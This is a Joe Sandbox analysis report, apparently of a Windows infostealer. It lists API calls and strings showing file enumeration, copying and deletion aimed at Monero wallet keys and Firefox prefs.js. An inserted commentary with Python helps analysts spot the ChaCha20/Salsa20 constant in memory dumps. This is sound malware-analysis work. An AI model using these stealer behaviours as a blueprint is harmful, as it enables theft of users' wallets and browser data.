                                        • Opcode Fuzzy Hash: 75679468e96aecc5c3cce016a40ec98ebf53cad8df310a93252737a5c3ec94d5
                                        • Instruction Fuzzy Hash: 88613676900219ABCF24EBA4DD45FEE737CBF89700F008698B60D96150EB75AB84CF91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009847D0
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009847D7
                                        • wsprintfA.USER32 ref: 009847F6
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0098480D
                                        • StrCmpCA.SHLWAPI(?,00990FAC), ref: 0098483B
                                        • StrCmpCA.SHLWAPI(?,00990FB0), ref: 00984851
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009848DB
                                        • FindClose.KERNEL32(000000FF), ref: 009848F0
                                        • lstrcat.KERNEL32(?,0181FC40), ref: 00984915
                                        • lstrcat.KERNEL32(?,0181E148), ref: 00984928
                                        • lstrlen.KERNEL32(?), ref: 00984935
                                        • lstrlen.KERNEL32(?), ref: 00984946
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 671575355-2848263008
                                        • Opcode ID: 7cb42ebcb3e3b2fea79a496cb94ad08b75d25545dac50c57c6cec21b4ae824e3
                                        • Instruction ID: ea83ee9a668450e1e87055aab9b65361eee5dcfcf8816e7b7e0e40044d8be52c
                                        • Opcode Fuzzy Hash: 7cb42ebcb3e3b2fea79a496cb94ad08b75d25545dac50c57c6cec21b4ae824e3
                                        • Instruction Fuzzy Hash: 035144B55442189BCB24EB74DC89FEE737CBB99700F404688B60D96150EB749B88CF91
                                        APIs
                                        • wsprintfA.USER32 ref: 00984113
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0098412A
                                        • StrCmpCA.SHLWAPI(?,00990F94), ref: 00984158
                                        • StrCmpCA.SHLWAPI(?,00990F98), ref: 0098416E
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 009842BC
                                        • FindClose.KERNEL32(000000FF), ref: 009842D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: 596692e80681df40ab326e665a6a1d6b8147cf328c8a58b4060e886f25ffaef7
                                        • Instruction ID: 8064c9b3994f5b72ac2bf258a957d8eee4509a1a7199ace3b1e0e3887277e521
                                        • Opcode Fuzzy Hash: 596692e80681df40ab326e665a6a1d6b8147cf328c8a58b4060e886f25ffaef7
                                        • Instruction Fuzzy Hash: 905188B6904118ABCB24FBB0DC85FEE737CBF94300F404688B61996150EB749B88CF90
                                        APIs
                                        • wsprintfA.USER32 ref: 0097EE3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0097EE55
                                        • StrCmpCA.SHLWAPI(?,00991630), ref: 0097EEAB
                                        • StrCmpCA.SHLWAPI(?,00991634), ref: 0097EEC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097F3AE
                                        • FindClose.KERNEL32(000000FF), ref: 0097F3C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: 88a5c89332c59a4011c9b9f383d6a748599cab7c832f8abef97cb914abf92329
                                        • Instruction ID: 25392b92dd5fd47a609ea5391a586534220c8f57b4e0951dbc2348c42d4d183f
                                        • Opcode Fuzzy Hash: 88a5c89332c59a4011c9b9f383d6a748599cab7c832f8abef97cb914abf92329
                                        • Instruction Fuzzy Hash: 16E1B4729111189AEB54FB60DD62FEE733DBF94300F4045DAB50A62192EF386B89CF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                        • API String ID: 0-1562099544
                                        • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction ID: 4ea20c9cd5496030d1aacf9f4323f6df4b60e257db2e7eb50d3f37544395a9d5
                                        • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction Fuzzy Hash: 2DE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
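The fragments "2-by", "expa", "nd 3" and "te k" in the string block of the function above are the 16-byte constant "expand 32-byte k" broken into its four little-endian dwords, which is how it looks once a compiler has turned it into immediates; the lone "expand 32-byte k" occurrences are the same constant still contiguous. That constant is the sigma of both Salsa20 and ChaCha20, so this function, with no API calls at all, is the key-setup/block function the report flags as "Detected potential crypto function". Which of the two ciphers it is cannot be read off the strings: Salsa20 places the four words at state positions 0, 5, 10 and 15, ChaCha20 contiguously at 0 to 3, and only the disassembly shows that. The Python below is an added example, not code from the Joe Sandbox report or the sample: it lists the dword values to search for in a dump and implements ChaCha20 (RFC 7539) as the assumed variant, checked against the RFC test vectors; the dump fragment it scans is constructed.

```python
"""Identify the 'expand 32-byte k' constant and exercise ChaCha20 with it.

Added example, not code from the Joe Sandbox report or the sample. The
cipher variant (ChaCha20 rather than Salsa20) is an assumption; the memory
blob below is constructed.
"""
from __future__ import annotations

import struct

SIGMA = b"expand 32-byte k"
# The four little-endian dwords a disassembler shows instead of the string:
# 0x61707865 'expa', 0x3320646E 'nd 3', 0x79622D32 '2-by', 0x6B206574 'te k'
SIGMA_WORDS = struct.unpack("<4I", SIGMA)
MASK = 0xFFFFFFFF


def find_sigma_words(blob: bytes) -> list[int]:
    """Offsets of each sigma dword in a dump, whether or not they are
    contiguous (after compilation they usually are not)."""
    hits: list[int] = []
    for word in SIGMA_WORDS:
        needle = struct.pack("<I", word)
        start = 0
        while (i := blob.find(needle, start)) != -1:
            hits.append(i)
            start = i + 1
    return sorted(hits)


def _rotl32(v: int, n: int) -> int:
    return ((v << n) & MASK) | (v >> (32 - n))


def _quarter_round(s: list[int], a: int, b: int, c: int, d: int) -> None:
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK; s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK; s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """RFC 7539 block: sigma in words 0-3, key 4-11, counter 12, nonce 13-15."""
    if len(key) != 32 or len(nonce) != 12:
        raise ValueError("ChaCha20 needs a 32-byte key and a 12-byte nonce")
    state = [*SIGMA_WORDS, *struct.unpack("<8I", key), counter & MASK,
             *struct.unpack("<3I", nonce)]
    w = state[:]
    for _ in range(10):                       # 20 rounds = 10 double rounds
        _quarter_round(w, 0, 4, 8, 12); _quarter_round(w, 1, 5, 9, 13)
        _quarter_round(w, 2, 6, 10, 14); _quarter_round(w, 3, 7, 11, 15)
        _quarter_round(w, 0, 5, 10, 15); _quarter_round(w, 1, 6, 11, 12)
        _quarter_round(w, 2, 7, 8, 13); _quarter_round(w, 3, 4, 9, 14)
    return struct.pack("<16I", *((x + y) & MASK for x, y in zip(w, state)))


def chacha20_xor(key: bytes, nonce: bytes, data: bytes, counter: int = 1) -> bytes:
    """Encrypt or decrypt (same operation) by XORing with the keystream."""
    out = bytearray()
    for off in range(0, len(data), 64):
        block = chacha20_block(key, counter + off // 64, nonce)
        out += bytes(p ^ k for p, k in zip(data[off:off + 64], block))
    return bytes(out)


# Constructed dump fragment: two of the four sigma dwords at offsets 8 and 16,
# separated by filler, as they might sit in separate 'mov' immediates.
CONSTRUCTED_DUMP = (b"\x90" * 8 + struct.pack("<I", 0x61707865)
                    + b"\xCC" * 4 + struct.pack("<I", 0x6B206574))

if __name__ == "__main__":
    print([hex(w) for w in SIGMA_WORDS])
    print(find_sigma_words(CONSTRUCTED_DUMP))
```

In practice the dword search is what you run over the .sdmp dumps listed above; once the constant is located, the order in which the four words are written into the state block tells you Salsa20 from ChaCha20, and the key and nonce loads next to them are where to set a breakpoint to recover the key the sample uses for its traffic or its strings.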
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009916B0,00990D97), ref: 0097F81E
                                        • StrCmpCA.SHLWAPI(?,009916B4), ref: 0097F86F
                                        • StrCmpCA.SHLWAPI(?,009916B8), ref: 0097F885
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097FBB1
                                        • FindClose.KERNEL32(000000FF), ref: 0097FBC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 1cfef1f428a99b500d6deb5c159b95a46bc826232fc602e6236a39bc7f76db68
                                        • Instruction ID: 89aab1f3c2a22009b87abf408d4bfb6bfae86687b18233ac4fa24ba2cb06dc57
                                        • Opcode Fuzzy Hash: 1cfef1f428a99b500d6deb5c159b95a46bc826232fc602e6236a39bc7f76db68
                                        • Instruction Fuzzy Hash: 07B113729001189BDB28FF64DDA6FED7379BF94300F0085A9E50E66291EF345B49CB92
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0099523C,?,?,?,009952E4,?,?,00000000,?,00000000), ref: 00971963
                                        • StrCmpCA.SHLWAPI(?,0099538C), ref: 009719B3
                                        • StrCmpCA.SHLWAPI(?,00995434), ref: 009719C9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00971D80
                                        • DeleteFileA.KERNEL32(00000000), ref: 00971E0A
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00971E60
                                        • FindClose.KERNEL32(000000FF), ref: 00971E72
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: e81f8f10bd455fb09f426d15dccee614cf08851e422e4eb082a6d29b68aaa1b6
                                        • Instruction ID: 9e3b4b313a59e872e13f904ce3e3f677ff78ac456019dd7fb7c46da0c1e00f2a
                                        • Opcode Fuzzy Hash: e81f8f10bd455fb09f426d15dccee614cf08851e422e4eb082a6d29b68aaa1b6
                                        • Instruction Fuzzy Hash: 5D12D4719101189BDB15FB64CCA6FEE7379BFA4300F4045DAB50A62191EF386B89CF51
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00990C32), ref: 0097DF5E
                                        • StrCmpCA.SHLWAPI(?,009915C0), ref: 0097DFAE
                                        • StrCmpCA.SHLWAPI(?,009915C4), ref: 0097DFC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097E4E0
                                        • FindClose.KERNEL32(000000FF), ref: 0097E4F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: b46ef4d0c0d73cf8a0de6335ff7441f6bd19b6be9c57eebe38588952e52f3425
                                        • Instruction ID: b4de6f834dbff58ff45b58e5723e957a05474ba6766822d2080f9e752b2c8920
                                        • Opcode Fuzzy Hash: b46ef4d0c0d73cf8a0de6335ff7441f6bd19b6be9c57eebe38588952e52f3425
                                        • Instruction Fuzzy Hash: 1AF18D719141189BDB15FB60CDA6FEE7339BFA4300F4045DAB41A62191EF386B89CF52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ![r$>n~k$>~hw$Trw_$Yiq?$w0H_$:Uf$U{]$U{]$x]
                                        • API String ID: 0-33530090
                                        • Opcode ID: ecbc98dd69ca4ef8c2a00a83ccdfcae7d027364f8f597372c8d52801db50b004
                                        • Instruction ID: 1a796def94d77c08e182329add66cd369d3e541501edb2b3bf88a0bd3638be93
                                        • Opcode Fuzzy Hash: ecbc98dd69ca4ef8c2a00a83ccdfcae7d027364f8f597372c8d52801db50b004
                                        • Instruction Fuzzy Hash: 74B2F5B3A082009FE7046F2DEC8567AFBE9EF94320F1A493DEAC5D7740E67558048796
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009915A8,00990BAF), ref: 0097DBEB
                                        • StrCmpCA.SHLWAPI(?,009915AC), ref: 0097DC33
                                        • StrCmpCA.SHLWAPI(?,009915B0), ref: 0097DC49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097DECC
